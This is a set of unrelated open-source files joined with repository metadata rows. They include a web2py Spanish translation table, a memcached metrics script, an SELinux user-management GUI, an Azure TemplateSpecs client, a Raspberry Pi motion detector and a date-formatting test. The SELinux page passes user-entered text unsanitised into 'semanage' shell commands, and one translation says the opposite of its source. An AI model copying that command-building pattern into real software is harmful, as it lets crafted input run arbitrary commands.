'Enable Close-Tag': 'Enable Close-Tag',
'Enable Code Folding': 'Enable Code Folding',
'Enterprise Web Framework': 'Framework Web Empresarial',
'Error': 'Error',
'Error logs for "%(app)s"': 'Bitácora de errores en "%(app)s"',
'Error snapshot': 'Error snapshot',
'Error ticket': 'Error ticket',
'Errors': 'errores',
'Errors in form, please check it out.': 'Errores en el formulario, verifique por favor.',
'Exception instance attributes': 'Atributos de la instancia de Excepción',
'Exit Fullscreen': 'Salir de pantalla completa',
'Expand Abbreviation': 'Expandir abreviación',
'Expand Abbreviation (html files only)': 'Expandir Abreviación (sólo archivos html)',
'export as csv file': 'exportar como archivo CSV',
'exposes': 'expone',
'exposes:': 'expone:',
'extends': 'extiende',
'failed to compile file because:': 'falló la compilación de archivos debido a:',
'failed to reload module': 'recarga del módulo ha fallado',
'failed to reload module because:': 'no es posible recargar el módulo por:',
'File': 'Archivo',
'file "%(filename)s" created': 'archivo "%(filename)s" creado',
'file "%(filename)s" deleted': 'archivo "%(filename)s" eliminado',
'file "%(filename)s" uploaded': 'archivo "%(filename)s" subido',
'file "%(filename)s" was not deleted': 'archivo "%(filename)s" no fue eliminado',
'file "%s" of %s restored': 'archivo "%s" de %s restaurado',
'file changed on disk': 'archivo modificado en el disco',
'file does not exist': 'archivo no existe',
'file saved on %(time)s': 'archivo guardado %(time)s',
'file saved on %s': 'archivo guardado %s',
'filter': 'filter',
'Find Next': 'Buscar próximo',
'Find Previous': 'Bucar anterior',
'First name': 'Nombre',
'Frames': 'Frames',
'Functions with no doctests will result in [passed] tests.': 'Funciones sin doctests equivalen a pruebas [aceptadas].',
'Git Pull': 'Git Pull',
'Git Push': 'Git Push',
'Globals##debug': 'Globals',
'graph model': 'graficación del modelo',
'Group ID': 'ID de Grupo',
'Hello World': 'Hola Mundo',
'Help': 'ayuda',
'here': 'aquí',
'Hide/Show Translated strings': 'Hide/Show Translated strings',
'Highlight current line': 'Highlight current line',
'htmledit': 'htmledit',
'If the report above contains a ticket number it indicates a failure in executing the controller, before any attempt to execute the doctests. This is usually due to an indentation error or an error outside function code.\nA green title indicates that all tests (if defined) passed. In this case test results are not shown.': 'Si el reporte anterior contiene un número de tiquete este indica un falla en la ejecución del controlador, antes de cualquier intento de ejecutat doctests. Esto generalmente se debe a un error en la indentación o un error por fuera del código de la función.\r\nUn titulo verde indica que todas las pruebas pasaron (si existen). En dicho caso los resultados no se muestran.',
'Image': 'Imagen',
'Import/Export': 'Importar/Exportar',
'includes': 'incluye',
'Indent with tabs': 'Indent with tabs',
'insert new': 'inserte nuevo',
'insert new %s': 'inserte nuevo %s',
'inspect attributes': 'inspeccionar atributos',
'Install': 'Instalar',
'Installation of %(plugin)s for %(app)s': 'Instalación de %(plugin)s para %(app)s',
'Installation of %(plugin)s for %(app)s app': 'Instalación de %(plugin)s para %(app)s app',
'Installed applications': 'Aplicaciones instaladas',
'Interaction at %s line %s': 'Interacción en %s línea %s',
'Interactive console': 'Terminal interactiva',
'internal error': 'error interno',
'Internal State': 'Estado Interno',
'Invalid action': 'Acción inválida',
'Invalid application name': 'Nombre de aplicación no válido',
'Invalid email': 'Correo inválido',
'invalid password': 'contraseña inválida',
'invalid password.': 'contraseña inválida.',
'Invalid Query': 'Consulta inválida',
'invalid request': 'solicitud inválida',
'Invalid request': 'Petición inválida',
'invalid ticket': 'tiquete inválido',
'Key bindings': 'Key bindings',
'Key bindings for ZenCoding Plugin': 'Key bindings para el Plugin ZenCoding',
'Keyboard shortcuts': 'Atajos de teclado',
'language file "%(filename)s" created/updated': 'archivo de lenguaje "%(filename)s" creado/actualizado',
'Language files (static strings) updated': 'Archivos de lenguaje (cadenas estáticas) actualizados',
'languages': 'lenguajes',
'Languages': 'Lenguajes',
'languages updated': 'lenguajes actualizados',
'Last name': 'Apellido',
'Last saved on:': 'Guardado en:',
'License for': 'Licencia para',
'License:': 'Licencia:',
'lists by ticket': 'listas por ticket',
'loading...': 'cargando...',
'locals': 'locals',
'Locals##debug': 'Locals',
'Login': 'Inicio de sesión',
'login': 'inicio de sesión',
'Login to the Administrative Interface': 'Inicio de sesión para la Interfaz Administrativa',
'Logout': 'fin de sesión',
'Lost Password': 'Contraseña perdida',
'manage': 'gestionar',
'Manage': 'Gestionar',
'Manage Cache': 'Administrar Caché',
'merge': 'combinar',
'Models': 'Modelos',
'models': 'modelos',
'Modules': 'Módulos',
'modules': 'módulos',
'Name': 'Nombre',
'new application "%s" created': 'nueva aplicación "%s" creada',
'New Application Wizard': 'New Application Wizard',
'New application wizard': 'Asistente para nueva aplicación',
'new plugin installed': 'nuevo plugin instalado',
'New plugin installed: %s': 'Nuevo plugin instalado: %s',
'New plugin installed: web2py.plugin.attachment.w2p': 'Nuevo plugin instalado: web2py.plugin.attachment.w2p',
'New plugin installed: web2py.plugin.dialog.w2p': 'Nuevo plugin instalado: web2py.plugin.dialog.w2p',
'New plugin installed: web2py.plugin.math2py.w2p': 'Nuevo plugin instalado: web2py.plugin.math2py.w2p',
'New plugin installed: web2py.plugin.timezone.w2p': 'Nuevo plugin instalado: web2py.plugin.timezone.w2p',
'New Record': 'Registro nuevo',
'new record inserted': 'nuevo registro insertado',
'New simple application': 'Nueva aplicación',
'next': 'siguiente',
'next 100 rows': '100 filas siguientes',
'NO': 'NO',
'No databases in this application': 'No hay bases de datos en esta aplicación',
'No Interaction yet': 'No hay interacción',
'no match': 'no encontrado',
'no package selected': 'ningún paquete seleccionado',
'No ticket_storage.txt found under /private folder': 'No se encontró ticket_storage.txt en la carpeta /private',
'online designer': 'diseñador en línea',
'or alternatively': 'o alternativamente',
'Or Get from URL:': 'O obtener desde una URL:',
'or import from csv file': 'o importar desde archivo CSV',
'or provide app url:': 'o provea URL de la aplicación:',
'or provide application url:': 'o provea URL de la aplicación:',
'Origin': 'Origen',
'Original/Translation': 'Original/Traducción',
'Overview': 'Revisión general',
'Overwrite installed app': 'sobreescriba la aplicación instalada',
'Pack all': 'empaquetar todo',
'Pack compiled': 'empaquete compiladas',
'Pack custom': 'empaquetar personalizado',
'pack plugin': 'empaquetar plugin',
'PAM authenticated user, cannot change password here': 'usuario autenticado por PAM, no puede cambiar la contraseña aquí',
'Password': 'Contraseña',
'password changed': 'contraseña cambiada',
'Peeking at file': 'Visualizando archivo',
'Please': 'Por favor',
'Plugin': 'Plugin',
'plugin "%(plugin)s" deleted': 'plugin "%(plugin)s" eliminado',
'Plugin "%s" in application': 'Plugin "%s" en aplicación',
'Plugin page': 'Página del plugin',
'plugins': 'plugins',
'Plugins': 'Plugins',
'Plural-Forms:': 'Plural-Forms:',
'Powered by': 'Este sitio usa',
'previous 100 rows': '100 filas anteriores',
'Private files': 'Archivos privados',
'private files': 'archivos privados',
'Project Progress': 'Progreso del Proyecto',
'Query:': 'Consulta:',
'RAM': 'RAM',
'Rapid Search': 'Búsqueda rápida',
'record': 'registro',
'record does not exist': 'el registro no existe',
'record id': 'id de registro',
'Record ID': 'ID de Registro',
'refresh': 'recargar',
'Register': 'Regístrese',
'Registration key': 'Contraseña de Registro',
'reload': 'recargar',
'Reload routes': 'Recargar rutas',
'Remove compiled': 'eliminar compilados',
'Removed Breakpoint on %s at line %s': 'Eliminado punto de ruptura en %s en la línea %s',
'Replace': 'Reemplazar',
'Replace All': 'Reemplazar todos',
'Repository (%s)': 'Repositorio (%s)',
'Repository: %s': 'Repositorio: %s',
'request': 'petición',
'Resolve Conflict file': 'archivo Resolución de Conflicto',
'response': 'respuesta',
'restore': 'restaurar',
'return': 'return',
'revert': 'revertir',
'Role': 'Rol',
'Rows in table': 'Filas en la tabla',
'Rows selected': 'Filas seleccionadas',
'rules are not defined': 'reglas no están definidas',
'Run tests in this file': 'Ejecute tests en este archivo',
"Run tests in this file (to run all files, you may also use the button labelled 'test')": "Ejecute tests en este archivo (para ejecutarlo en todos los archivos, podrías usar el botón etiquetado como 'test')",
'Running on %s': 'Ejecutando en %s',
'Save': 'Guardar',
'save': 'guardar',
'Save file:': 'Guardar archivo:',
'Save file: %s': 'Guardar archivo: %s',
'Save via Ajax': 'Guardar vía Ajax',
'Saved file hash:': 'Hash del archivo guardado:',
'Screenshot %s': 'Screenshot %s',
'Screenshots': 'Screenshots',
'selected': 'seleccionado(s)',
'session': 'sesión',
'session expired': 'sesión expirada',
'Set Breakpoint on %s at line %s: %s': 'Establecer punto de ruptura en %s en la línea %s: %s',
'shell': 'shell',
'Site': 'sitio',
'some files could not be removed': 'algunos archivos no pudieron ser removidos',
'source : filesystem': 'fuente : sistema de archivos',
'Start a new app': 'Start a new app',
'Start searching': 'Iniciar búsqueda',
'Start wizard': 'Iniciar asistente',
'state': 'estado',
'Static': 'Estáticos',
'static': 'estáticos',
'Static files': 'Archivos estáticos',
'Statistics': 'Estadísticas',
'step': 'paso',
'stop': 'parar',
'submit': 'enviar',
'Submit': 'Enviar',
'Success!': '¡Éxito!',
'successful': 'exitoso',
'Sure you want to delete this object?': '¿Está seguro que desea eliminar este objeto?',
'switch to : db': 'cambiar a : db',
'Tab width (# characters)': 'Tab width (# characters)',
'table': 'tabla',
'Table name': 'Nombre de la tabla',
'test': 'probar',
'Testing application': 'Probando aplicación',
'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.': 'La "consulta" es una condición como "db.tabla1.campo1==\'valor\'". Algo como "db.tabla1.campo1==db.tabla2.campo2" resulta en un JOIN SQL.',
'The application logic, each URL path is mapped in one exposed function in the controller': 'La lógica de la aplicación, cada ruta URL se mapea en una función expuesta en el controlador',
'the application logic, each URL path is mapped in one exposed function in the controller': 'la lógica de la aplicación, cada ruta URL se mapea en una función expuesta en el controlador',
'the data representation, define database tables and sets': 'la representación de datos, define tablas y conjuntos de base de datos',
'The data representation, define database tables and sets': 'La representación de datos, define tablas y conjuntos de base de datos',
'The presentations layer, views are also known as templates': 'La capa de presentación, las vistas también son llamadas plantillas',
'the presentations layer, views are also known as templates': 'la capa de presentación, las vistas también son llamadas plantillas',
'Theme': 'Theme',
'There are no controllers': 'No hay controladores',
'There are no models': 'No hay modelos',
'There are no modules': 'No hay módulos',
'There are no plugins': 'No hay plugins',
'There are no private files': 'No hay archivos privados',
'There are no static files': 'No hay archivos estáticos',
'There are no translators, only default language is supported': 'No hay traductores, sólo el lenguaje por defecto es soportado',
'There are no views': 'No hay vistas',
'These files are not served, they are only available from within your app': 'Estos archivos no se proveen, ellos sólo están disponibles para su aplicación',
'These files are served without processing, your images go here': 'Estos archivos se proveen sin procesar, sus imágenes van aquí',
'these files are served without processing, your images go here': 'estos archivos se proveen sin procesar, sus imágenes van aquí',
'This is the %(filename)s template': 'Está es la plantilla %(filename)s',
'this page to see if a breakpoint was hit and debug interaction is required.': 'esta página para ver si un punto de ruptura fue configurado y la depuración es requerida.',
'Ticket': 'Ticket',
'Ticket ID': 'Ticket ID',
'Timestamp': 'Timestamp',
'TM': 'MR',
'to previous version.': 'a la versión previa.',
'To create a plugin, name a file/folder plugin_[name]': 'Para crear un plugin, nombre un archivo/carpeta plugin_[nombre]',
'To emulate a breakpoint programatically, write:': 'Para emular un punto de ruptura programáticamente, escriba',
'to use the debugger!': '¡usar el debugger!',
'toggle breakpoint': 'alternar punto de ruptura',
'Toggle comment': 'Alternar comentario',
'Toggle Fullscreen': 'Alternar pantalla completa',
'Traceback': 'Rastreo',
'translation strings for the application': 'cadenas de caracteres de traducción para la aplicación',
'Translation strings for the application': 'Cadenas de caracteres de traducción para la aplicación',
'try': 'intente',
'try something like': 'intente algo como',
'Try the mobile interface': 'Pruebe la interfaz móvil',
'try view': 'Pruebe la vista',
'Type some Python code in here and hit Return (Enter) to execute it.': 'Escriba algún código Python aquí y teclee la tecla Enter para ejecutarlo',
'Unable to check for upgrades': 'No es posible verificar la existencia de actualizaciones',
'unable to create application "%s"': 'no es posible crear la aplicación "%s"',
'unable to delete file "%(filename)s"': 'no es posible eliminar el archivo "%(filename)s"',
'unable to delete file plugin "%(plugin)s"': 'no es posible eliminar plugin "%(plugin)s"',
'Unable to download': 'No es posible la descarga',
'Unable to download app': 'No es posible descargar la aplicación',
'Unable to download app because:': 'No es posible descargar la aplicación porque:',
'Unable to download because': 'No es posible descargar porque',
'unable to install application "%(appname)s"': 'unable to install application "%(appname)s"',
'unable to parse csv file': 'no es posible analizar el archivo CSV',
'unable to uninstall "%s"': 'no es posible instalar "%s"',
'unable to upgrade because "%s"': 'no es posible actualizar porque "%s"',
'uncheck all': 'desmarcar todos',
'Uninstall': 'desinstalar',
'update': 'actualizar',
'update all languages': 'actualizar todos los lenguajes',
'Update:': 'Actualice:',
'upgrade now to %s': 'upgrade now to %s',
'upgrade web2py now': 'actualize web2py ahora',
'Upload': 'Subir',
'Upload & install packed application': 'Suba e instale aplicación empaquetada',
'Upload a package:': 'Subir un paquete:',
'Upload and install packed application': 'Suba e instale una aplicación empaquetada',
'upload application:': 'subir aplicación:',
'Upload existing application': 'Suba esta aplicación',
'upload file:': 'suba un archivo:',
'upload plugin file:': 'suba un archivo de plugin:',
'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.': 'Use (...)&(...) para AND, (...)|(...) para OR, y ~(...) para NOT, para crear consultas más complejas.',
'User ID': 'ID de Usuario',
'variables': 'variables',
'Version': 'Versión',
'versioning': 'versiones',
'Versioning': 'Versiones',
'view': 'vista',
'Views': 'Vistas',
'views': 'vistas',
'Web Framework': 'Web Framework',
'web2py is up to date': 'web2py está actualizado',
'web2py online debugger': 'web2py debugger en línea',
'web2py Recent Tweets': 'Tweets Recientes de web2py',
'web2py upgraded; please restart it': 'web2py actualizado; favor reiniciar',
'Welcome to web2py': 'Bienvenido a web2py',
'YES': 'SÍ',
'Yes': 'Sí',
'You are going to install': 'Vas a instalar',
'You can inspect variables using the console below': 'Puedes inspeccionar las variables utilizando la terminal de abajo',
'You need to set up and reach a': 'Necesitas configurar y obtener un',
'Your application will be blocked until you click an action button (next, step, continue, etc.)': 'Tu aplicación será bloqueada hasta que des click en un botón de acción (siguiente, paso, continuar, etc.)',
}
| gpl-3.0 | -3,982,503,381,662,950,400 | 51.746421 | 700 | 0.721359 | false |
kadashu/satori | satori-rules/plugin/memcache/60_memcache.py | 1 | 1626 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# -- stdlib --
import json
import socket
import subprocess
import telnetlib
import time
# -- third party --
# -- own --
# -- code --
ts = int(time.time())
proc = subprocess.Popen(['/bin/bash', '-c', r'''ps -ef |grep memcached|grep -v grep |sed -n 's/.* *-p *\([0-9]\{1,5\}\).*/\1/p' '''], stdout=subprocess.PIPE)
ports = map(int, proc.stdout.read().strip().split())
rst = []
for port in ports:
try:
conn = telnetlib.Telnet('0.0.0.0', port)
conn.write('stats\r\nquit\r\n')
lines = conn.read_until('END')
lines = lines.split('\r\n')
assert lines[-1] == 'END'
conn.close()
except Exception:
continue
stats = dict([i.split(' ', 2)[1:] for i in lines[:-1]])
    for i in ('pid', 'uptime', 'version', 'libevent', 'time'):
        stats.pop(i, '')
stats = {k: float(v) for k, v in stats.items()}
stats['usage'] = 100 * stats['bytes'] / stats['limit_maxbytes']
def add_ratio(a, b):
try:
stats[a + '_ratio'] = 100 * stats[a] / (stats[a] + stats[b])
except ZeroDivisionError:
stats[a + '_ratio'] = 0
add_ratio('get_hits', 'get_misses')
add_ratio('incr_hits', 'incr_misses')
add_ratio('decr_hits', 'decr_misses')
add_ratio('delete_hits', 'delete_misses')
add_ratio('cas_hits', 'cas_misses')
add_ratio('touch_hits', 'touch_misses')
rst.extend([{
'metric': 'memcached.%s' % k,
'timestamp': ts,
'step': 60,
'value': v,
'tags': {'port': str(port)},
} for k, v in stats.items()])
print json.dumps(rst)
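# Illustrative only: with a memcached instance on port 11211, each emitted
# entry looks roughly like
#   {"metric": "memcached.get_hits_ratio", "timestamp": 1424000000,
#    "step": 60, "value": 99.2, "tags": {"port": "11211"}}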
| apache-2.0 | 3,021,739,656,081,259,500 | 25.655738 | 157 | 0.53936 | false |
jpacg/su-binary | jni/selinux/gui/usersPage.py | 1 | 5487 | ## usersPage.py - show selinux mappings
## Copyright (C) 2006,2007,2008 Red Hat, Inc.
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
## Author: Dan Walsh
import string
import gtk
import gtk.glade
import os
import gobject
import sys
try:
from subprocess import getstatusoutput
except ImportError:
from commands import getstatusoutput
import seobject
from semanagePage import *
##
## I18N
##
PROGNAME = "policycoreutils"
try:
import gettext
kwargs = {}
if sys.version_info < (3,):
kwargs['unicode'] = True
gettext.install(PROGNAME,
localedir="/usr/share/locale",
codeset='utf-8',
**kwargs)
except:
try:
import builtins
builtins.__dict__['_'] = str
except ImportError:
import __builtin__
__builtin__.__dict__['_'] = unicode
class usersPage(semanagePage):
def __init__(self, xml):
semanagePage.__init__(self, xml, "users", _("SELinux User"))
self.store = gtk.ListStore(gobject.TYPE_STRING, gobject.TYPE_STRING, gobject.TYPE_STRING, gobject.TYPE_STRING, gobject.TYPE_STRING)
self.view.set_model(self.store)
self.store.set_sort_column_id(0, gtk.SORT_ASCENDING)
col = gtk.TreeViewColumn(_("SELinux\nUser"), gtk.CellRendererText(), text=0)
col.set_sort_column_id(0)
col.set_resizable(True)
self.view.append_column(col)
col = gtk.TreeViewColumn(_("MLS/\nMCS Range"), gtk.CellRendererText(), text=1)
col.set_resizable(True)
self.view.append_column(col)
col = gtk.TreeViewColumn(_("SELinux Roles"), gtk.CellRendererText(), text=2)
col.set_resizable(True)
self.view.append_column(col)
self.load()
self.selinuxUserEntry = xml.get_widget("selinuxUserEntry")
self.mlsRangeEntry = xml.get_widget("mlsRangeEntry")
self.selinuxRolesEntry = xml.get_widget("selinuxRolesEntry")
def load(self, filter=""):
self.filter = filter
self.user = seobject.seluserRecords()
dict = self.user.get_all()
self.store.clear()
for k in sorted(dict.keys()):
range = seobject.translate(dict[k][2])
if not (self.match(k, filter) or self.match(dict[k][0], filter) or self.match(range, filter) or self.match(dict[k][3], filter)):
continue
iter = self.store.append()
self.store.set_value(iter, 0, k)
self.store.set_value(iter, 1, range)
self.store.set_value(iter, 2, dict[k][3])
self.view.get_selection().select_path((0,))
def dialogInit(self):
store, iter = self.view.get_selection().get_selected()
self.selinuxUserEntry.set_text(store.get_value(iter, 0))
self.selinuxUserEntry.set_sensitive(False)
self.mlsRangeEntry.set_text(store.get_value(iter, 1))
self.selinuxRolesEntry.set_text(store.get_value(iter, 2))
def dialogClear(self):
self.selinuxUserEntry.set_text("")
self.selinuxUserEntry.set_sensitive(True)
self.mlsRangeEntry.set_text("s0")
self.selinuxRolesEntry.set_text("")
def add(self):
user = self.selinuxUserEntry.get_text()
range = self.mlsRangeEntry.get_text()
roles = self.selinuxRolesEntry.get_text()
self.wait()
(rc, out) = getstatusoutput("semanage user -a -R '%s' -r %s %s" % (roles, range, user))
self.ready()
if rc != 0:
self.error(out)
return False
iter = self.store.append()
self.store.set_value(iter, 0, user)
self.store.set_value(iter, 1, range)
self.store.set_value(iter, 2, roles)
def modify(self):
user = self.selinuxUserEntry.get_text()
range = self.mlsRangeEntry.get_text()
roles = self.selinuxRolesEntry.get_text()
self.wait()
(rc, out) = getstatusoutput("semanage user -m -R '%s' -r %s %s" % (roles, range, user))
self.ready()
if rc != 0:
self.error(out)
return False
self.load(self.filter)
def delete(self):
store, iter = self.view.get_selection().get_selected()
try:
user = store.get_value(iter, 0)
if user == "root" or user == "user_u":
raise ValueError(_("SELinux user '%s' is required") % user)
self.wait()
(rc, out) = getstatusoutput("semanage user -d %s" % user)
self.ready()
if rc != 0:
self.error(out)
return False
store.remove(iter)
self.view.get_selection().select_path((0,))
except ValueError as e:
self.error(e.args[0])
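# For reference, the manual commands this page shells out to are equivalent
# to the following (arguments illustrative):
#   semanage user -a -R 'staff_r sysadm_r' -r s0-s0:c0.c1023 myuser
#   semanage user -m -R 'staff_r' -r s0 myuser
#   semanage user -d myuser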
| gpl-2.0 | 2,246,079,205,972,420,400 | 33.080745 | 140 | 0.609805 | false |
Azure/azure-sdk-for-python | sdk/resources/azure-mgmt-resource/azure/mgmt/resource/templatespecs/v2021_05_01/aio/_template_specs_client.py | 1 | 4199 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional, TYPE_CHECKING
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration import TemplateSpecsClientConfiguration
from .operations import TemplateSpecsOperations
from .operations import TemplateSpecVersionsOperations
from .. import models
class TemplateSpecsClient(object):
"""The APIs listed in this specification can be used to manage Template Spec resources through the Azure Resource Manager.
:ivar template_specs: TemplateSpecsOperations operations
:vartype template_specs: azure.mgmt.resource.templatespecs.v2021_05_01.aio.operations.TemplateSpecsOperations
:ivar template_spec_versions: TemplateSpecVersionsOperations operations
:vartype template_spec_versions: azure.mgmt.resource.templatespecs.v2021_05_01.aio.operations.TemplateSpecVersionsOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: Subscription Id which forms part of the URI for every service call.
:type subscription_id: str
:param str base_url: Service URL
"""
def __init__(
self,
credential: "AsyncTokenCredential",
subscription_id: str,
base_url: Optional[str] = None,
**kwargs: Any
) -> None:
if not base_url:
base_url = 'https://management.azure.com'
self._config = TemplateSpecsClientConfiguration(credential, subscription_id, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._serialize.client_side_validation = False
self._deserialize = Deserializer(client_models)
self.template_specs = TemplateSpecsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.template_spec_versions = TemplateSpecVersionsOperations(
self._client, self._config, self._serialize, self._deserialize)
async def _send_request(self, http_request: HttpRequest, **kwargs: Any) -> AsyncHttpResponse:
"""Runs the network request through the client's chained policies.
:param http_request: The network request you want to make. Required.
:type http_request: ~azure.core.pipeline.transport.HttpRequest
:keyword bool stream: Whether the response payload will be streamed. Defaults to True.
:return: The response of your network call. Does not do error handling on your response.
:rtype: ~azure.core.pipeline.transport.AsyncHttpResponse
"""
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
http_request.url = self._client.format_url(http_request.url, **path_format_arguments)
stream = kwargs.pop("stream", True)
pipeline_response = await self._client._pipeline.run(http_request, stream=stream, **kwargs)
return pipeline_response.http_response
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "TemplateSpecsClient":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
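# Minimal usage sketch (not part of the generated code; assumes valid Azure
# credentials and real resource names):
#
#     from azure.identity.aio import DefaultAzureCredential
#
#     async with TemplateSpecsClient(DefaultAzureCredential(), "<subscription-id>") as client:
#         spec = await client.template_specs.get("<resource-group>", "<template-spec-name>")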
| mit | 2,766,160,840,868,600,000 | 47.825581 | 128 | 0.69207 | false |
opieters/wcamera | src/motion_detector.py | 1 | 5950 | #!/usr/bin/env python
# this code was inspired by this tutorial by Adrian Rosebrock:
# http://www.pyimagesearch.com/2015/06/01/home-surveillance-and-motion-detection-with-the-raspberry-pi-python-and-opencv/
import time, datetime, json, cv2, warnings
import RPi.GPIO as GPIO
from argparse import ArgumentParser
from imutils import resize
from picamera.array import PiRGBArray
from picamera import PiCamera, PiCameraError
from threading import Timer
# global objects
class MD:
    def __init__(self, camera, conf):
        """Initialise the motion detector with a camera object and a
        configuration dictionary.
        """
self.conf = conf
self.camera = camera
self.run_complete = False
# filter warnings
warnings.filterwarnings("ignore")
# create and configure camera object
self.camera.resolution = tuple(conf["detection resolution"])
self.camera.framerate = self.conf["fps"]
# define all 'private' methods
def reset_variables(self):
"""Reset all variables to default values."""
        self.run_complete = False
def delete(self):
"""Release all nessesary veriables and stop timers."""
if self.conf["show video"]:
cv2.destroyAllWindows()
# clean GPIO pins
if self.conf["stop detection GPIO pin"] >= 0:
GPIO.cleanup(self.conf["stop detection GPIO pin"])
    def run_timer_callback(self, pin=None):
        """Flag the current run as complete; serves both as the GPIO event
        callback (which passes a pin) and as the Timer callback."""
self.run_complete = True
def run(self,duration=None):
"""Perform motion detecton."""
self.reset_variables()
# warming up camera
print "[INFO] warming up..."
time.sleep(self.conf["camera warmup time"])
avg_frame = None
rawCapture = PiRGBArray(self.camera, size=tuple(self.conf["resolution"]))
# limit recording duration if needed
if self.conf["duration"] > 0:
            run_timer = Timer(self.conf["duration"], self.run_timer_callback)
run_timer.start()
else:
run_timer = None
# setup GPIO pin to stop run on event
if self.conf["stop detection GPIO pin"] >= 0:
            GPIO.setmode(GPIO.BCM)  # assumption: BCM numbering (the original never set a pin mode)
            GPIO.setup(self.conf["stop detection GPIO pin"], GPIO.IN)
GPIO.add_event_detect(self.conf["stop detection GPIO pin"], GPIO.BOTH, callback=self.run_timer_callback)
try:
# loop over frames
for raw_frame in self.camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
# capture current frame
frame = raw_frame.array
timestamp = datetime.datetime.now()
# resize, convert to grayscale and blur (less noise)
frame = resize(frame, width=self.conf["detection width"])
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, tuple(self.conf["motion blur kernel size"]), self.conf["motion blur std x"])
# init average frame
if avg_frame is None:
print("[INFO] Starting background model...")
avg_frame = gray.copy().astype("float")
rawCapture.truncate(0)
continue
# update background frame
cv2.accumulateWeighted(gray, avg_frame, self.conf["motion dection average weight"])
# compute difference of current and average frame and detect values above threshold
frame_diff = cv2.absdiff(gray, cv2.convertScaleAbs(avg_frame))
frame_thr = cv2.threshold(frame_diff, self.conf["motion threshold"], 255, cv2.THRESH_BINARY)[1]
# fill holes (dilate) in image and find countours on threshold image
frame_thr = cv2.dilate(frame_thr, None, iterations=2)
(cnts,_) = cv2.findContours(frame_thr.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
# default: no motion
motion = False
# loop over contours (try to find motion)
for c in cnts:
# ignore contour if too small
if cv2.contourArea(c) < self.conf["motion min area"]:
continue
motion = True
# no annotations, leave frame as is
if not self.conf["annotations"]:
break
# compute contour bouding box and draw on frame
(x,y,w,h) = cv2.boundingRect(c)
cv2.rectangle(frame, (x,y), (x+w, y+h), (0, 255, 0), 2)
# draw timestamp on frame
cv2.putText(frame, timestamp.strftime("%A %d %B %Y %I:%M:%S%p"), (10, frame.shape[0]-10), cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)
break
# if motion has been detected, save frame to file
if motion:
timestamp_txt = timestamp.strftime("%x-%X")
print("[INFO] Motion detected at " + timestamp_txt)
cv2.imwrite(self.conf["directory"] + "motion-" + timestamp_txt, frame)
# show frame and record if user pressed key
if self.conf["show video"]:
cv2.imshow("Security Feed",frame)
cv2.imshow("Thresh",frame_thr)
cv2.imshow("Frame Delta",frame_diff)
# cleanup (go to most recent frame)
rawCapture.truncate(0)
# stop for-loop if needed
if self.run_complete:
break
except KeyboardInterrupt:
print("[INFO] Motion detection stopped.")
except PiCameraError:
print("[ERROR] Camera error... Stopped detection.")
# clean timer if set
if run_timer is not None:
run_timer.cancel()
run_timer.join()
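# Minimal usage sketch (assumes a JSON configuration file providing the keys
# referenced above, e.g. "fps", "detection resolution", "duration"):
#
#     with open("conf.json") as f:
#         conf = json.load(f)
#     camera = PiCamera()
#     md = MD(camera, conf)
#     md.run()
#     md.delete()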
| mit | -4,295,866,812,982,044,000 | 36.898089 | 157 | 0.564706 | false |
lorenzogil/yith-library-server | yithlibraryserver/tests/test_locale.py | 1 | 1557 | # Yith Library Server is a password storage server.
# Copyright (C) 2012-2013 Lorenzo Gil Sanchez <[email protected]>
#
# This file is part of Yith Library Server.
#
# Yith Library Server is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Yith Library Server is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Yith Library Server. If not, see <http://www.gnu.org/licenses/>.
import datetime
import unittest
from yithlibraryserver.locale import DatesFormatter
class DatesFormatterTests(unittest.TestCase):
def test_date(self):
df_en = DatesFormatter('en')
df_es = DatesFormatter('es')
date = datetime.date(2012, 12, 12)
self.assertEqual(df_en.date(date), 'Dec 12, 2012')
self.assertEqual(df_es.date(date), '12 dic. 2012')
def test_datetime(self):
df_en = DatesFormatter('en')
df_es = DatesFormatter('es')
date = datetime.datetime(2012, 12, 12, 12, 12, 12)
self.assertEqual(df_en.datetime(date), 'Dec 12, 2012, 12:12:12 PM')
self.assertEqual(df_es.datetime(date), '12 dic. 2012 12:12:12')
